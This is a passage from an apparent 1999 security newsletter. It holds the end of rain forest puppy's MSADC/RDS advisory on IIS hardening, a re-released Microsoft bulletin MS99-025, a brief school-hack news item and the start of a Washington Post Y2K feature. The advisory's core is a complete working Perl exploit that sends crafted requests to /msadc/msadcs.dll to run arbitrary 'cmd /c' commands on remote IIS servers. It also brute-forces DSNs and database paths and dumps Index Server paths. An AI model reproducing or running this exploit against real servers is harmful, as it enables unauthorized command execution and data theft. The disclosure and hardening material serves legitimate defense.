cooperate with the DBAs at your location to come up with a suitable, yet secure handler definition. Those who don't need RDS: I would still upgrade your MDAC and run HANDSAFE.EXE just in case. But you can basically prevent people from using RDS remotely by removing the /msadc/ virtual root. You can do this in MMC or via the IIS Administration HTML interface. For everybody: While we're digging around IIS, let's do a little cleaning up, shall we? Let's start off with ODBC. Open up Control Panel, and go into ODBC. Look at the DSNs defined under User, System, and File. You should delete any DSNs you do not use, especially sample/default DSNs, such as 'pubs', 'advworks', 'adctest', etc. You should fully research the need for any particular DSN you use. And personally, I would suggest when in doubt, record the configuration information and then remove it. Recording the information is important in case you have to put it back. Now, under ODBC Drivers, again, you should remove any drivers you do not use. Having 'SQL Server' means people could potentially proxy off your machine to another SQL server. The 'Microsoft Text Driver' should definately be deleted. The more you delete, the safer you are. Let's now pop over to IIS. Pull up MMC or the adminstrative web interface. Follow down the tree branches until you get to Default Web Site (or whatever your website might be). Examine which virtual directories you have mounted into your site. You should research the uses of these as well, deleting when in doubt (record the 'Properties' information first just in case). Virtual directories I suggest deleting (if you have them): IISSamples This are the sample pages shipped with IIS--and contain a few bugs IISHelp you can remove this. It's HTML help reference. IISadmpwd this is an IIS util for users to change their passwords via IIS. Unfortunately it contains a few bugs. I suggest you remove it. Msadc mentioned above, remove if you don't need RDS If you have Cold Fusion installed, you'll also have CFdocs. I suggest you remove it, as it contains a horde of exploitable sample scripts. On to the last check, which are physical files. I'm going to assume the web directory is c:\inetpub. Adjust accordingly. I suggest checking the following: -- c:\inetpub\scripts\tools This contains by default a few tools to make DSNs. I suggest you delete everything in this directory. Or, if you're worried about deleting it, than MOVE it out of the directory, and into one that's *NOT* available through your web server -- c:\inetpub\scripts\samples Samples. Need I say more? Delete or move them. Contians scripts that are known to be exploitable (see my ODBC advisory) -- c:\inetpub\scripts\iisadmin This is the IIS 3.0 administration interface. IIS 4.0 uses something different. Delete or move everything. Again, contains exploitable sample scripts. -- c:\inetpub\iissamples\ This contains the ExAir sample site, typically the SDK, and other fun goodies. But they're samples. Delete or move the whole directory. Contains exploitable sample scripts. That should lock you down a lot more than the average IIS install. Unfortunately every location is different, so I can't guarantee you're secure now. But you're 'less unsecure'. :) - 7 - Command Line Options To run the program, just save this whole advisory to a file, such as msadc.pl. Then run "perl -x msadc.pl". Perl is smart and will figure out how to run the script at the end. No need to cut and paste. :) Ok, the command switches are as follows: -h this is the host to scan. You MUST either use either -h or -R. -d this is the delay between connections. Value is in number of seconds. I added this because hammering the RDS components caused the server to occasionally stop responding :) Defaults to 1. Use -d 0 to disable. -V Use VbBusObj instead of DataFactory to run the queries. NOTE: please read the -N information below as to suggestions for checking if VbBusObj exists. VbBusObj does not give good error reporting; therefore it is quite possible to have false positives (and false negatives). Consider VbBusObj support 3 stages before beta. Don't say I didn't warn you. -v verbose. This will print the ODBC error information. Really only for troubleshooting purposes. -e external dictionary file to use on step 5--the 'DSN dictionary guess' stage. The file should just be plaintext, one DSN name per line file with all the DSN names you want to try. Quite honestly a normal dictionary file won't do you much good. You can probably do pretty damn well with a few dozen or two good ones, like 'www', 'data', 'database', 'sql', etc. -R resume. You can still specify -v or -d with -R. This will cause the script to read in rds.save and execute the command on the last valid connection. -N Use VbBusObj to try to get the machine's NetBIOS name. It may return no name if the VbBusObj is unavailable. I suggest you use -N to see if VbBusObj exists (a NetBIOS name will be returned if so) before you use -V. -X perform an Index Server table dump instead. None of the other switches really apply here, other than -v (although -d still works, there's no need to slow down one query). This dumps the root paths from Index Server, which can be rather lengthy. I suggest you pipe the output into a file. Also, if there is a lot of return information, this command may take a while to complete. Be patient. And I don't suggest you use this command more than once a minute...it caused my P200 w/ 128 RAM to stop answering requests, and in general borked inetinfo.exe. If you do decide to CONTROL-C during the middle of the data download the script will save all received data into a file called 'raw.out', so you don't loose everything you've already received. NOTE: this is the raw data, which is in Unicode. NOTE ON SUCCESS: The script reports 'Success!' when it has issued a valid SQL statement. 'Success!' does *NOT* mean that your command worked. If they have MDAC 2.1+ shell commands are worthless, so the script will report 'Success!' (it went through) but your command didn't run (MDAC 2.1 didn't interpret it). There's no return indication to know whether your command worked or not. As with the ODBC commands, you're flying blind. - 8 - Random Q & A - "This or that function of the script is broken" -- Well, it wasn't broken when I used it, so you must of broke it. No, seriously. I've tested it on Linux, L0pht tested it on Solaris, and Vacuum tested it on NT (using Perl 5.005-03 for Windows). They worked for us. I've coded some various checks for errors, but nothing robust. But I know it worked for me. :) - "Why don't you code this in C?" -- Because I've been programming C/C++ for 8 years. I'm tired of it. I've been coding perl for 3, so it's new and fresh, and I'm just now starting to do interesting stuff. Plus the code is portable this way. Come on, where else can you have a piece of code that does network/socket level stuff that runs on NT, Linux, and Solaris with no changes??!? - "Or you going to port this to C?" -- It wouldn't be that hard at all, but wasn't planning on it. You have something against perl? - "What's the F in Russell F. Prigogine stand for?" -- Fabio. Fear the geese. - "Why do you act like this is a joke?" -- Because I don't get paid for doing this, I don't get donations, and I don't get any sexual gratification from this what-so-ever. I do this because I *like* to, because it's *FUN*--so damn it, I'm having fun! - "I don't get some of the jokes in the paper. Like what's FMP?" -- If you have to ask, you wouldn't understand. This advisory is teeming with inside jokes. RFP, FMP. - "Who picked your switches? v/V, R, X, N...d,v,h,e...they make no sense." -- They do to me. - "Where can I find the Internet's largest archive of hacked websites?" -- Oh, wonderful that you should ask. www.attrition.org is just the place. Say 'hi' to Jericho for me when you get there. - 9 - Signoff Ok, I've been coding the script, reading MS database propaganda (did I mention yet I hate database stuff?), and writing this damn advisory for a collective of 30 hours. About time I stop and never think about it again. :) So you have my best shot at the RDS exploit, even though I think there may be something pretty nifty hiding in the Data Shape Provider (or maybe Index Server). We'll just have to wait and see if/when Greg and Russ finally decide they can share their toys. Remember, I spent 2 days typing all this in an attempt to teach people something, rather than to just release the vanilla exploit. So if you want to label me irresponsible, well, I suppose I could have been more so. Moreover, I support eEye in what they did 100%. Russ says "there are numerous unwritten rules when it comes to security disclosures". Rules? Unwritten? Well, maybe eEye was unaware of these rules, since they're not written down. Future updates to this advisory and exploit code will be posted to www.technotronic.com/rfp/ Well, it's been fun. Until the next release (which may be sooner than you think ;) - rain forest puppy / R. F. Prigogine - - ADM / Wiretrip - - rfp@wiretrip.net - *** SPECIAL THANKS once again to Mudge and Weld from www.l0pht.com for helping me out on the preliminary assessment, and Mike Dinowitz from www.houseoffusion.com and Vacuum from www.technotronic.com for creative input. Time is creation. The future is just not there. Kitetoa, did you hack my ham sandwich!?!? - 10 - The Code!!!! Again, to run this, save this advisory to a file (for instance msadc.txt) and then run 'perl -x file' (ie perl -x msadc.txt). #!perl # # MSADC/RDS 'usage' (aka exploit) script # # by rain.forest.puppy # # Many thanks to Weld, Mudge, and Dildog from l0pht for helping me # beta test and find errors! use Socket; use Getopt::Std; getopts("e:vd:h:XRVN", \%args); print "-- RDS exploit by rain forest puppy / ADM / Wiretrip --\n"; if (!defined $args{h} && !defined $args{R}) { print qq~ Usage: msadc.pl -h { -d -X -v } -h = host you want to scan (ip or domain) -d = delay between calls, default 1 second -X = dump Index Server path table, if available -N = query VbBusObj for NetBIOS name -V = use VbBusObj instead of ActiveDataFactory -v = verbose -e = external dictionary file for step 5 Or a -R will resume a command session ~; exit;} $ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target=""; if (defined $args{v}) { $verbose=1; } else {$verbose=0;} if (defined $args{d}) { $delay=$args{d};} else {$delay=1;} if(!defined $args{R}){ $ip.="." if ($ip=~/[a-z]$/); $target= inet_aton($ip) || die("inet_aton problems; host doesn't exist?");} if (!defined $args{R}){ $ret = &has_msadc; } if (defined $args{X} && !defined $args{R}) { &hork_idx; exit; } if (defined $args{N}) {&get_name; exit;} print "Please type the NT commandline you want to run (cmd /c assumed):\n" . "cmd /c "; $in=; chomp $in; $command="cmd /c " . $in ; if (defined $args{R}) {&load; exit;} print "\nStep 1: Trying raw driver to btcustmr.mdb\n"; &try_btcustmr; print "\nStep 2: Trying to make our own DSN..."; &make_dsn ? print "<>\n" : print "<>\n"; print "\nStep 3: Trying known DSNs..."; &known_dsn; print "\nStep 4: Trying known .mdbs..."; &known_mdb; if (defined $args{e}){ print "\nStep 5: Trying dictionary of DSN names..."; &dsn_dict; } else { "\nNo -e; Step 5 skipped.\n\n"; } print "Sorry Charley...maybe next time?\n"; exit; ############################################################################## sub sendraw { # ripped and modded from whisker sleep($delay); # it's a DoS on the server! At least on mine... my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,80,$target)){ select(S); $|=1; print $pstr; my @in=; select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); }} ############################################################################## sub make_header { # make the HTTP request my $which, $msadc; # yeah, this is WAY redundant. I'll fix it later if (defined $args{V}){ $msadc=<Datasource creation successful<\/H2>/;}} } return 0;} ############################################################################## sub verify_exists { my ($page)=@_; my @results=sendraw("GET $page HTTP/1.0\n\n"); return $results[0];} ############################################################################## sub try_btcustmr { my @drives=("c","d","e","f"); my @dirs=("winnt","winnt35","winnt351","win","windows"); foreach $dir (@dirs) { print "$dir -> "; # fun status so you can see progress foreach $drive (@drives) { print "$drive: "; # ditto $reqlen=length( make_req(1,$drive,$dir) ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(1,$drive,$dir)); if (rdo_success(@results)){print "Success!\n";save(1,1,$drive,$dir);exit;} else { verbose(odbc_error(@results)); funky(@results);}} print "\n";}} ############################################################################## sub odbc_error { my (@in)=@_; my $base; my $base = content_start(@in); if($in[$base]=~/application\/x-varg/){ # it *SHOULD* be this $in[$base+4]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; $in[$base+5]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; $in[$base+6]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g; return $in[$base+4].$in[$base+5].$in[$base+6];} print "\nNON-STANDARD error. Please sent this info to rfp\@wiretrip.net:\n"; print "$in : " . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] . $in[$base+4] . $in[$base+5] . $in[$base+6]; exit;} ############################################################################## sub verbose { my ($in)=@_; return if !$verbose; print STDOUT "\n$in\n";} ############################################################################## sub save { my ($p1, $p2, $p3, $p4)=@_; open(OUT, ">rds.save") || print "Problem saving parameters...\n"; print OUT "$ip\n$p1\n$p2\n$p3\n$p4\n"; close OUT;} ############################################################################## sub load { my @p; my $drvst="driver={Microsoft Access Driver (*.mdb)}; dbq="; open(IN,"; close(IN); $ip="$p[0]"; $ip=~s/\n//g; $ip.="." if ($ip=~/[a-z]$/); $target= inet_aton($ip) || die("inet_aton problems"); print "Resuming to $ip ..."; $p[3]="$p[3]"; $p[3]=~s/\n//g; $p[4]="$p[4]"; $p[4]=~s/\n//g; if($p[1]==1) { $reqlen=length( make_req(1,"$p[3]","$p[4]") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(1,"$p[3]","$p[4]")); if (rdo_success(@results)){print "Success!\n";} else { print "failed\n"; verbose(odbc_error(@results));}} elsif ($p[1]==3){ if(run_query("$p[3]")){ print "Success!\n";} else { print "failed\n"; }} elsif ($p[1]==4){ if(run_query($drvst . "$p[3]")){ print "Success!\n"; } else { print "failed\n"; }} exit;} ############################################################################## sub create_table { return 1 if (defined $args{V}); my ($in)=@_; $reqlen=length( make_req(2,$in,"") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(2,$in,"")); return 1 if rdo_success(@results); my $temp= odbc_error(@results); verbose($temp); return 1 if $temp=~/Table 'AZZ' already exists/; return 0;} ############################################################################## sub known_dsn { # we want 'wicca' first, because if step 2 made the DSN, it's ready to go my @dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications", "cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM", "banner", "banners", "ads", "ADCDemo", "ADCTest"); foreach $dSn (@dsns) { print "."; next if (!is_access("DSN=$dSn")); if(create_table("DSN=$dSn")){ print "$dSn successful\n" if (!defined $args{V}); if(run_query("DSN=$dSn")){ print "Success!\n"; save (3,3,"DSN=$dSn",""); exit; }}} print "\n";} ############################################################################## sub is_access { my ($in)=@_; return 1 if (defined $args{V}); $reqlen=length( make_req(5,$in,"") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(5,$in,"")); my $temp= odbc_error(@results); verbose($temp); return 1 if ($temp=~/Microsoft Access/); return 0;} ############################################################################## sub run_query { my ($in)=@_; $reqlen=length( make_req(3,$in,"") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(3,$in,"")); return 1 if rdo_success(@results); my $temp= odbc_error(@results); verbose($temp); return 0;} ############################################################################## sub known_mdb { my @drives=("c","d","e","f","g"); my @dirs=("winnt","winnt35","winnt351","win","windows"); my $dir, $drive, $mdb; my $drv="driver={Microsoft Access Driver (*.mdb)}; dbq="; # this is sparse, because I don't know of many my @sysmdbs=( "\\catroot\\icatalog.mdb", "\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb", "\\system32\\certmdb.mdb", "\\system32\\certlog\\certsrv.mdb" ); #these are %systemroot% my @mdbs=( "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb", "\\cfusion\\cfapps\\forums\\forums_.mdb", "\\cfusion\\cfapps\\forums\\data\\forums.mdb", "\\cfusion\\cfapps\\security\\realm_.mdb", "\\cfusion\\cfapps\\security\\data\\realm.mdb", "\\cfusion\\database\\cfexamples.mdb", "\\cfusion\\database\\cfsnippets.mdb", "\\inetpub\\iissamples\\sdk\\asp\\database\\authors.mdb", "\\progra~1\\common~1\\system\\msadc\\samples\\advworks.mdb", "\\cfusion\\brighttiger\\database\\cleam.mdb", "\\cfusion\\database\\smpolicy.mdb", "\\cfusion\\database\cypress.mdb", "\\progra~1\\ableco~1\\ablecommerce\\databases\\acb2_main1.mdb", "\\website\\cgi-win\\dbsample.mdb", "\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb", "\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb" ); #these are just \ foreach $drive (@drives) { foreach $dir (@dirs){ foreach $mdb (@sysmdbs) { print "."; if(create_table($drv . $drive . ":\\" . $dir . $mdb)){ print "\n" . $drive . ":\\" . $dir . $mdb . " successful\n" if (!defined $args{V}); if(run_query($drv . $drive . ":\\" . $dir . $mdb)){ print "Success!\n"; save (4,4,$drive . ":\\" . $dir . $mdb,""); exit; }}}}} foreach $drive (@drives) { foreach $mdb (@mdbs) { print "."; if(create_table($drv . $drive . $dir . $mdb)){ print "\n" . $drive . $dir . $mdb . " successful\n" if (!defined {V}); if(run_query($drv . $drive . ":" . $dir . $mdb)){ print "Success!\n"; save (4,4,$drive . $dir . $mdb,""); exit; }}}} } ############################################################################## sub hork_idx { print "\nAttempting to dump Index Server tables...\n"; print " NOTE: Sometimes this takes a while, other times it stalls\n\n"; $reqlen=length( make_req(4,"","") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw2(make_header() . make_req(4,"","")); if (rdo_success(@results)){ my $max=@results; my $c; my %d; for($c=19; $c<$max; $c++){ $results[$c]=~s/\x00//g; $results[$c]=~s/[^a-zA-Z0-9:~ \\\._]{1,40}/\n/g; $results[$c]=~s/[^a-zA-Z0-9:~ \\\._\n]//g; $results[$c]=~/([a-zA-Z]\:\\)([a-zA-Z0-9 _~\\]+)\\/; $d{"$1$2"}="";} foreach $c (keys %d){ print "$c\n"; } } else {print "Index server not installed/query failed\n"; }} ############################################################################## sub dsn_dict { open(IN, "<$args{e}") || die("Can't open external dictionary\n"); while(){ $hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold"; print "."; next if (!is_access("DSN=$dSn")); if(create_table("DSN=$dSn")){ print "$dSn successful\n" if(!defined $args{V}); if(run_query("DSN=$dSn")){ print "Success!\n"; save (3,3,"DSN=$dSn",""); exit; }}} print "\n"; close(IN);} ############################################################################## sub sendraw2 { # ripped and modded from whisker sleep($delay); # it's a DoS on the server! At least on mine... my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,80,$target)){ open(OUT,">raw.out"); my @in; select(S); $|=1; print $pstr; while(){ print OUT $_; push @in, $_; print STDOUT ".";} close(OUT); select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); }} ############################################################################## sub content_start { # this will take in the server headers my (@in)=@_; my $c; for ($c=1;$c<500;$c++) { if($in[$c] =~/^\x0d\x0a/){ if ($in[$c+1]=~/^HTTP\/1.[01] [12]00/) { $c++; } else { return $c+1; }}} return -1;} # it should never get here actually ############################################################################## sub funky { my (@in)=@_; my $error=odbc_error(@in); if($error=~/ADO could not find the specified provider/){ print "\nServer returned an ADO miscofiguration message\nAborting.\n"; exit;} if($error=~/A Handler is required/){ print "\nServer has custom handler filters (they most likely are patched)\n"; exit;} if($error=~/specified Handler has denied Access/){ print "\nADO handlers denied access (they most likely are patched)\n"; exit;}} ############################################################################## sub has_msadc { my @results=sendraw("GET /msadc/msadcs.dll HTTP/1.0\n\n"); my $base=content_start(@results); return if($results[$base]=~/Content-Type: application\/x-varg/); my @s=grep("Server",@results); if($s[0]!~/IIS/){ print "Doh! They're not running IIS.\n" } else { print "/msadc/msadcs.dll was not found.\n";} exit;} ############################################################################## sub get_name { # this was added last minute my $msadc=<.,?]//g; print "Machine name: $results[$base+6]\n";} ############################################################################## # Note: This is not a good example of precision code. It is very # redundant and has a few kludges. I have been adding features in one at # at a time, so it has resulted in redundant functions and patched code. # I will be rewriting it in the future, sometime. Look for the newer code # revisions at www.technotronic.com/rfp/ # This may also be included in the NT-PTK/P. If you don't know what that # is, just wait and see. :) ############################################################################## 42.0 Highschool crackers ~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by BHZ, Tuesday 20th July 1999 on 9:37 pm CET Hacker broke into computer system at East Chapel Hill High School and ruined two years worth of the principal’s work. School officials said that their system has been penetrated before, but no such damage was done. They learned their lesson and now they are installing 12.000 dollars worth of security software. @HWA 43.0 Unauthorized Access to IIS Servers through ODBC Data Access with RDS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by BHZ, Tuesday 20th July 1999 on 3:30 pm CET Microsoft re-released Microsoft Security Bulletin MS98-004, issued July 17, 1998. As they say: "It has recently been brought to our attention that this vulnerability has been used to gain unauthorized access to Internet-connected systems that have instructions in MS98-004". Just a reminder this advisory deals with The RDS DataFactory object, a component of Microsoft Data Access Components (MDAC). Read the re-released advisory at the url below; http://www.microsoft.com/security/bulletins/ms99-025.asp --===Microsoft Security Advisor Program: Microsoft Security Bulletin (MS99-025)===-- Microsoft Security Bulletin (MS99-025) Re-Release: Unauthorized Access to IIS Servers through ODBC Data Access with RDS *Originally Released as MS98-004, July 17, 1998* *Re-Released as MS99-025, July 19, 1999* _Preface_ This bulletin is a re-release of Microsoft Security Bulletin MS98-004 [http://www.microsoft.com/security/bulletins/ms98-004.asp] , issued July 17, 1998. It has recently been brought to our attention that this vulnerability has been used to gain unauthorized access to Internet-connected systems that have not been updated as per the instructions in MS98-004. The intent of re-releasing this bulletin is to serve as a reminder about this vulnerability, to restate the threat, and encourage system administrators to evaluate their systems to determine if their systems have been correctly configured and updated to protect against this vulnerability. _Summary_ Microsoft encourages the following actions be taken on systems that have Microsoft® Internet Information Server 3.0 or 4.0 and Microsoft Data Access Components 1.5, both of which are installed during a default installation of the Windows NT® 4.0 Option pack: + Install the latest version of MDAC (currently MDAC 2.1 SP2) However, simply upgrading from MDAC 1.5 to MDAC 2.0, or MDAC 2.1 is not sufficient. For systems not explicitly utilizing RDS functionality, you should also: + Delete the /msadc virtual directory from the default Web site, or + Apply registry settings that disable the DataFactory object. (See the Q for the registry settings to adjust, or to download a .REG file that can make the changes for you.) For systems implicitly utilizing RDS functionality, you should: + Disable Anonymous Access for the /msadc directory in the default Web site, and/or + Create a Custom Handler to control or filter incoming requests: http://www.microsoft.com/Data/ado/rds/custhand.htm [http://www.microsoft.com/Data/ado/rds/custhand.htm] If you do not complete these steps, unauthorized access as described below may still be possible. Frequently asked questions regarding this vulnerability and updating systems to protect against it can be found at _http://www.microsoft.com/security/bulletins/MS99-025faq.asp_ _Issue_ The RDS DataFactory object, a component of Microsoft Data Access Components (MDAC), exposes unsafe methods. When installed on a system running Internet Information Server 3.0 or 4.0, the DataFactory object may permit an otherwise unauthorized web user to perform privileged actions, including: + Allowing unauthorized users to execute shell commands on the IIS system as a privileged user. + On a multi-homed Internet-connected IIS system, using MDAC to tunnel SQL and other ODBC data requests through the public connection to a private back-end network. + Allowing unauthorized accessing to secured, non-published files on the IIS system. _Affected Software Versions_ + Microsoft Internet Information Server 3.0 or 4.0 that have or have had Microsoft Data Access Components 1.5 installed on it. _NOTE:_ IIS can be installed as part of other Microsoft products like Microsoft BackOffice and Microsoft Site Server. _NOTE:_ MDAC 1.5 is installed during a default installation of the Windows NT 4.0 Option Pack. _Patch Availability_ Newer versions of Microsoft Data Access Components (MDAC versions 2.0 and 2.1) resolve these known vulnerabilities. However, a system that had MDAC 1.5 installed on it, and then upgraded to MDAC 2.0 or MDAC 2.1 must still take actions to disable the DataFactory object. (See the Q for the registry settings to adjust, or to download a .REG file that can make the changes for you.) Current versions of Microsoft Data Access Components can be downloaded from the following web site: + Microsoft Data Access Download Site: http://www.microsoft.com/data/download.htm [http://www.microsoft.com/data/download.htm] _More Information_ Please see the following references for more information related to this issue. + Microsoft Security Bulletin MS99-025: Frequently Asked Questions, _http://www.microsoft.com/security/bulletins/MS99-025faq.asp_ + Microsoft Knowledge Base (KB) article Q184375, *Security Implications of RDS 1.5, IIS, and ODBC*, http://support.microsoft.com/support/kb/articles/q184/3/75.asp [http://support.microsoft.com/support/kb/articles/q184/3/75.asp] + Microsoft Universal Data Access Download Page, http://www.microsoft.com/data/download.htm [http://www.microsoft.com/data/download.htm] + Installing MDAC Q, http://www.microsoft.com/data/MDAC21info/MDACinstQ.htm [http://www.microsoft.com/data/MDAC21info/MDACinstQ.htm] + Microsoft Security Advisor web site, http://www.microsoft.com/security/default.asp [http://www.microsoft.com/security/default.asp] + IIS Security Checklist, http://www.microsoft.com/security/products/iis/CheckList.asp [http://www.microsoft.com/security/products/iis/CheckList.asp] _Obtaining Support on this Issue_ Microsoft Data Access Components (MDAC) is a fully supported set of technologies. If you require technical assistance with this issue, please contact Microsoft Technical Support. For information on contacting Microsoft Technical Support, please see http://support.microsoft.com/support/contact/default.asp [http://support.microsoft.com/support/contact/default.asp] . _Acknowledgments_ Microsoft acknowledges Greg Gonzalez of ITE (http://www.infotechent.net [http://www.infotechent.net] ) for bringing additional information regarding this vulnerability to our attention. Microsoft also acknowledges Russ Cooper (NTBugTraq [http://www.ntbugtraq.com/] ) for his assistance around this issue. _Revisions_ + July 19, 1999: Bulletin Created as re-release of MS98-004. http://www.microsoft.com/security_ --> ------------------------------------------------------------------------------- THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY. _© 1999 Microsoft Corporation. All rights reserved. Terms of Use._ @HWA 44.0 Who's fault is the Y2K bug? ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ Y2K PORTFOLIO by BHZ, Tuesday 20th July 1999 on 3:11 pm CET Washington Post wrote terrific article on Y2K situation, its past and its present. They even contacted "the man responsible" for Y2K bug - Robert Bemer. He wrote wrote the American Standard Code for Information Interchange (ASCII) and popularized the use of the backslash, and invented the "escape" sequence in programming. In the late 50's he also helped on writing COBOL. He said that the early programmers were unconcerned about the year 2000 because they expected their programs to last only a few years - and that is how Y2K "bug" started. Read whole article below. THE MILLENNIUM BUG We Know It Can Hurt Us. We Know It Didn't Have To Be. What We Didn't Know, Until Today, Was Whom We Can Blame for Letting It Loose. By Gene Weingarten Washington Post Staff Writer Sunday, July 18, 1999; Page F01 We are knocking at the door of a high-rise apartment in Baileys Crossroads, with a question so awful we are afraid to ask it. We do not wish to cause a heart attack. A woman invites us in and summons her husband, who shuffles in from another room. She is 78. He is 82. They met in the 1960s as middle-management civil servants, specialists in an aspect of data processing so technical, so nebbishy, that many computer professionals disdain it. He was her boss. Management interface blossomed into romance. Their marriage spans three decades. They are still in love. "You know how we use Social Security numbers alone to identify everyone?" she says. She points proudly to her husband. "That all started with this kid!" The kid has ice cube spectacles and neck wattles. He has been retired for years. Some of his former colleagues guessed he was deceased. His phone is unlisted. We located him through a mumbled tip from a man in a nursing home, followed up with an elaborate national computer search. Computers--they're magic. It is still early. We have, alas, roused them from bed. She is feisty. He is pleasantly grumpy. They are nice people. Here is what we have to ask him: Are you the man who is responsible for the greatest technological disaster in the history of mankind? Did you cause a trillion-dollar mistake that some believe will end life as we know it six months from now, throwing the global economy into a tailspin, disrupting essential services, shutting down factories, darkening vast areas of rural America, closing banks, inciting civic unrest, rotting the meat in a million freezers, pulling the plug on life-sustaining medical equipment, blinding missile defense systems, leaving ships adrift on the high seas, snarling air traffic, causing passenger planes to plummet from the skies? Obligingly, he awaits the question. He is wearing pajamas. A Hot Date By now, everyone knows that on Jan. 1, 2000, something dreadful will happen on a global scale. Or possibly it will not. Experts are divided. This much is indisputable: To prevent it, billions of dollars have already been expended not only by government, which is prone to squandering money on foolishness, but also by big business, which is not. This is no empty scare. Technology has been the propulsive force behind civilization, but from time to time technology has loudly misfired. In the name of progress, there have been profound blunders: Filling zeppelins with hydrogen. Treating morning sickness with Thalidomide. Constructing aqueducts with lead pipes, poisoning half the population of ancient Rome. Still, there is nothing that quite compares with the so-called "Millennium Bug." It is potentially planetary in scope. It is potentially catastrophic in consequence. And it is, at its heart, stunningly stupid. It is not like losing a kingdom for want of a nail; it is like losing a kingdom because some idiot made the nails out of marshmallows. On Jan. 1, 2000, huge numbers of computers worldwide are expected to fail because, despite the foreseeable folly of it, they have always been programmed to think of the year in two digits only. The two-digit year is a convention as ancient as the feather pen--writing the date on a personal letter with an apostrophe in the year, implying a prefix of 17- or 18- or 19-. But reading an apostrophe requires sentience and judgment. Computers possess neither. They cannot distinguish an "00" meaning 1900 from an "00" meaning 2000. When asked, for example, to update a woman's age on Jan. 1, 2000, a computer might subtract her year of birth (say, '51) from the current year ('00), and conclude she will not be born for another 51 years. A human would instantly realize the nature of the error, adjust his parameters, and recalculate. Computers aren't built that way. They require absolute, either-or, plus-or-minus, binary logic at every step of their operation, and if this process is stymied even momentarily, if there is a juncture at which neither plus nor minus yields a comprehensible response, a computer will react immaturely. Sometimes it will start acting out--doing petulant, antisocial things such as coughing out daffy data or obliterating files. More often, the computer will simply burst into tears. It will shut itself down. The permutations of the Y2K problem are bewildering. If General Motors has fixed its computers, that's swell; but if the hydroelectric plant that sells power to the subcontractor who imports the rubber that is used to make tires for GM cars has not fixed its problem, the GM assembly line closes down anyway. Plus, the Y2K problem is hard-wired into millions of microprocessor chips, independent mini-brains that are embedded in things like automobiles, traffic control systems, medical equipment, factory control panels; some businesses aren't even certain where all their microprocessors are. Never has a calamity been so predictable, and so inevitable, tied to a deadline that can be neither appealed nor postponed. Diplomacy is fruitless. Nuclear deterrence isn't a factor. This can't be filibustered into the next Congress. Y2K has powerful, nearly mystical, themes. For some religious fundamentalists who have long been predicting a millennial apocalypse, the avenging instrument has finally loomed into view. For Luddites aghast at the excesses of the industrialized world, Y2K is the perfect comeuppance. For anyone who has ever read Vonnegut or Eliot, the ironies are lush. This is the way the world ends. Not with a bang but a . . . crash. Because society has been gamely focused on working together to forestall disaster, not much effort has so far been expended on senseless finger-pointing. The civility will end after the first of the year. Finger-pointing will no longer be senseless. One question will be asked repeatedly, mostly by attorneys gearing up for lawsuits: Who screwed up? The search for a culprit is an honored American tradition. It nourishes both law and journalism. When things go bad, we demand a fall guy. A scapegoat. A patsy. Today we'll search for one, and find him. The Unsquashable Bug First, it isn't really a "bug." The term "computer bug" was coined by Navy computer pioneer Grace Hopper in the 1950s after a moth got into one of her machines and it went haywire. A "bug" implies something unforeseeable. The Y2K problem wasn't just foreseeable, it was foreseen. Writing in February 1979 in an industry magazine called Interface Age, computer industry executive Robert Bemer warned that unless programmers stopped dropping the first two digits of the year, programs "may fail from ambiguity in the year 2000." This is geekspeak for the Y2K problem. Five years later, the husband-wife team of Jerome T. and Marilyn J. Murray wrote it much more plainly. In a book called "Computers in Crisis: How to Avoid the Coming Worldwide Computer Systems Collapse," they predicted Y2K with chilling specificity. Few people read it. The year was 1984, and to many, the book seemed very 1984-ish: a paranoid 